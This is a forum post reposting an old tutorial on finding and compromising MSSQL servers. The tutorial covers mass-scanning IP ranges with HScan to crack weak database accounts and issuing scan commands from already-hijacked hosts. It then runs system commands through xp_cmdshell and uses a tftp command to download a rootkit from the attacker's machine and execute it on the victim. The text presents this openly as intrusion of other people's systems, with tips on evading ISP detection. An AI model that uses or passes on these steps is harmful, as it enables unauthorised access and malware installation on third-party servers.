Thread: MYSQL Hacking Tutorial
View Single Post
Old 10-09-2008, 03:37 AM   #1 (permalink)
Centurion
Administrator
 
Centurion's Avatar
 
Join Date: Dec 2007
Posts: 318
Credits: 17,761
Thanks: 0
Thanked 49 Times in 28 Posts
My Mood:
Rep Power: 10 Centurion has disabled reputation
Default MYSQL Hacking Tutorial
Code:
MSSQL Hacking 
MSSQL Hacking by wtfmates - 26-05-2005
wtfm4tes [at] gmail.com
=========================

I'm going to try to keep this tutorial as simple as possible. This tutorial will tell you how to Find and Exploit MSSQL servers.

You will need:


<!-- Begin: AdBrite, Generated: 2008-10-09 2:27:50  -->
<style type="text/css">
   .adHeadline {font: bold 10pt Arial; text-decoration: underline; color: #74A202;}
   .adText {font: normal 10pt Arial; text-decoration: none; color: #cccccc;}
</style>
<script type="text/javascript">
try{var AdBrite_Iframe=window.top!=window.self?2:1;var AdBrite_Referrer=document.referrer==''?document.location:document.referrer;AdBrite_Referrer=encodeURIComponent(AdBrite_Referrer);}catch(e){var AdBrite_Iframe='';var AdBrite_Referrer='';}
document.write(String.fromCharCode(60,83,67,82,73,80,84));document.write(' src="http://ads.adbrite.com/mb/text_group.php?sid=562611&br=1&dk=706572736f6e616c735f335f325f776562&col=3&ifr='+AdBrite_Iframe+'&ref='+AdBrite_Referrer+'" type="text/javascript">');document.write(String.fromCharCode(60,47,83,67,82,73,80,84,62));</script>
<div><a class="adHeadline" target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=562611&afsid=1">Your Ad Here</a></div>
<!-- End: AdBrite -->

SQLExec (Google it, theres a few versions, the NetHackerIII version or the Green Apple ones will suffice)
A Portscanner (h!!p://home.hccnet.nl/m3ssi4h.rul3z/)
HSCAN v1.20 (h!!p://home.hccnet.nl/m3ssi4h.rul3z/)
TFTPD32 (h!!p://tftpd32.jounin.net/)

Ok, I'll cover two ways to find MSSQL Servers. Well..its actually one way just preformed slightly different ways.

First Method (Range Method):

Basically just load up HScan v1.20 (hscan_gui.exe) and go Menu -> Modules and uncheck everything except 'Check hostname of target'
and 'Check MSSQL weak accounts'. Now under Menu -> Parameters just enter a Start IP and a End IP, Adjust Max Threads/Host to whatever
your comfortable with, when scanning from home i use 20 Threads and 5 Hosts. If scanning from a ScanStro (more on this later) I use
anywhere from 25 to 50 threads and anywhere from 10 to 20 hosts. I leave the Timeout and SleepTime to default and also leave 'Ping host
before scan' checked. Once you have this all set accordingly click OK and now click Menu -> Start to start whoring whatever range you
selected.

What this will do is Ping -> Check TCP 1433 -> Resolve hostname -> Attempt to crack MSSQL Accts

To do this remotely from a scanstro using normal hscan cli simply send a raw

SITE EXEC hide.exe hscan.exe -h 192.168.0.1 192.168.0.254 -report -name -mssql -max 30,10

Second Method (List Method):

This is pretty much the exact same as the range method your using a host list instead of whoring a range. I prefer this method as it tends
to attract less attention and wont set off as many alarms at your ISP. Basically in Parameters in hscan_hui just check off 'Hosts List'
and open a list ip's with mssql servers running on them. To get such a list you can usually check your fav boards or im sure there are
some scanners out there that have good enough logging options that can do it for you as well. Also using your scanstro to portscan would
suffice as well. To preform a host list based mssql scan from a scan stro simply send a raw like this:

SITE EXEC hide.exe hscan.exe -f hosts.txt -report -name -mssql -max 30,10

Exploiting:

Anywh0re, After aforementioned scans are finished you should hopefully have some cracked accounts to play with. The scan results generated
by hscan are in HTML format and look a little something like this:

-----------------------------------------
192.168.0.151 (p1336.omgwtfhax.info)

192.168.0.152 (p1337.omgwtfhax.info)

[MYSQL SCAN]
Version: 4.1.8
Cracked account: root/[null]

192.168.0.153 (p1338.omgwtfhax.info)
-----------------------------------------

From what i can tell the 'NetHackerIII' version of sqlexec.exe is easier to find then the Green Apple one so I'll use that on in my
examples. (MS-SQL Exec for NetHackerIII Version 1.0.0.0)

Open sqlexec.exe and you'll be prompted with some ghey screen? (TianXing Free Regsitration Center) Just click Later. Now this screen
should be pretty self explanitory. In this case we would put 192.168.0.152 in the Host box and "root" without quotes in Username and
Password is just left blank ([null] == nothing derr) Hit Connect and for a test command i use 'ver' instead of 'dir c:\' so my output
looks a little something like this:

-----------------------------------------
MS-SQL Exec for NetHackerIII Version 1.0.0.0
Copyright © TianXing Software Kingdom 1999-2001.
Programmed by ChenWeishan 2001.2
WEB: h!!p://www.tianxing.org , h!!p://www.softkingdom.net
Email: tianxing [at] 163.net
ICQ: 13101363 , OICQ: 911189

SQL>Connecting 192.168.0.152.
SQL>Connected to 192.168.0.152.
SQL>Command: xp_cmdshell "ver"
LzÃÂ�?öÀÈÑ�gC½ö ŠÃ‚¼Ã´=’ÃÂ�?öÀÈÑ�Ãœ�õ� ÃÂ�?Ñ�8¯"‚
Mcft Windows 2000 [Versão 5.00.2195]
Mcft Windows 2000 [Versão 5.00.2195]
-----------------------------------------

<!-- Begin: AdBrite, Generated: 2008-10-09 2:27:50  -->
<style type="text/css">
   .adHeadline {font: bold 10pt Arial; text-decoration: underline; color: #74A202;}
   .adText {font: normal 10pt Arial; text-decoration: none; color: #cccccc;}
</style>
<script type="text/javascript">
try{var AdBrite_Iframe=window.top!=window.self?2:1;var AdBrite_Referrer=document.referrer==''?document.location:document.referrer;AdBrite_Referrer=encodeURIComponent(AdBrite_Referrer);}catch(e){var AdBrite_Iframe='';var AdBrite_Referrer='';}
document.write(String.fromCharCode(60,83,67,82,73,80,84));document.write(' src="http://ads.adbrite.com/mb/text_group.php?sid=562611&br=1&dk=706572736f6e616c735f335f325f776562&col=3&ifr='+AdBrite_Iframe+'&ref='+AdBrite_Referrer+'" type="text/javascript">');document.write(String.fromCharCode(60,47,83,67,82,73,80,84,62));</script>
<div><a class="adHeadline" target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=562611&afsid=1">Your Ad Here</a></div>
<!-- End: AdBrite -->

This is where TFTPD32 comes in. Run tftpd32.exe and make sure you set the 'Server interface' to your real ip and not your LAN one should
it show up in the list. Now you can upload your favorite rootkit or scanstro to this box in the following fashion, send the command:

tftp -i 1.3.3.7 get rootkit.exe C:\winnt\system32\rootkit.exe

Where 1.3.3.7 is your ip, now send:

start C:\winnt\system32\rootkit.exe

That should execute the rootkit on the box and you can now close sqlexec and should now have access via whatever means your rootkit
provides. Happy rooting!
-wtfmates
__________________
Centurion is offline   Reply With Quote